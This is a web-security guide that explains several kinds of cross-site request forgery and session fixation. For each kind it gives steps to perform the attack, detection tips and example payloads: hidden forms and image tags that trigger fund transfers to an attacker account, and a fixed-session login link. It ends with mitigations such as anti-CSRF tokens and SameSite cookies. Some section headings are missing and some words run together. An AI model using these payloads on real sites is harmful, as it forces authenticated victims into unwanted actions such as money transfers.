Cross-Site Request Forgery (CSRF) is an attack that tricks a user into performing actions they did not intend to by leveraging their authenticated session with a web application. This document provides methods for identifying various types of CSRF vulnerabilities and strategies for mitigating them.
1. Simple CSRF
Simple CSRF involves tricking a user into making an unintended request, typically by embedding malicious code in a webpage or email. To perform a Simple CSRF attack, craft an HTML form or request that targets the web application's endpoint and include it in a webpage or email. To detect it, analyze the application for state-changing requests that do not require additional authentication beyond a user's session. Here are some Example Payloads:
<form action="http://target.com/transfer" method="POST">
<input type="hidden" name="amount" value="1000">
<input type="hidden" name="recipient" value="attacker_account">
<input type="submit" value="Submit">
</form>Session Fixation attacks exploit an application’s handling of session identifiers to hijack a user’s session. To perform a Session Fixation attack, set a session identifier for a user before they log in and then use this identifier after they authenticate. To detect it, examine if the application allows session identifiers to be set or fixed before user authentication. Here are some Example Payloads:
<a href="http://target.com/login?session=attacker_session_id">Login Here</a>CSRF with DOM-based Attacks manipulates client-side scripts to exploit CSRF vulnerabilities. To perform it, inject payloads that leverage DOM manipulation to alter client-side behavior or submit forms. To detect it, review client-side scripts for DOM-based vulnerabilities and see if user actions are altered in unintended ways. Here are some Example Payloads:
document.getElementById('target_form').submit();CSRF with Third-Party Services involves tricking a user into performing actions on external services where the user is authenticated. To perform it, create malicious requests targeting third-party services where the user has an active session. To detect it, analyze interactions with third-party services and check if actions can be triggered through user interaction without re-authentication. Here are some Example Payloads:
<img src="http://thirdparty.com/api/transfer?amount=1000&recipient=attacker" style="display:none">5. Stored CSRF
Stored CSRF involves storing the malicious payload on the server, which then affects other users who retrieve the stored content. To perform it, inject malicious requests or payloads into user-generated content that will be rendered for other users. To detect it, identify stored content in the application and check if it includes payloads that can cause unwanted actions when viewed by other users. Here are some Example Payloads:
<img src="http://target.com/transfer?amount=1000&recipient=attacker" style="display:none">- Use CSRF Tokens: Implement anti-CSRF tokens in forms and requests. Ensure these tokens are unique for each request and validated on the server.
- SameSite Cookies: Configure cookies with the
SameSiteattribute to restrict cross-site requests. - Double Submit Cookies: Combine cookies with a custom header or token to verify requests.
- Referer Header Validation: Check the
Refererheader to ensure requests are coming from legitimate pages. However, note that this method is less reliable as headers can be spoofed. - User Interaction Verification: For critical actions, use additional user interactions (e.g., CAPTCHAs) to confirm intent.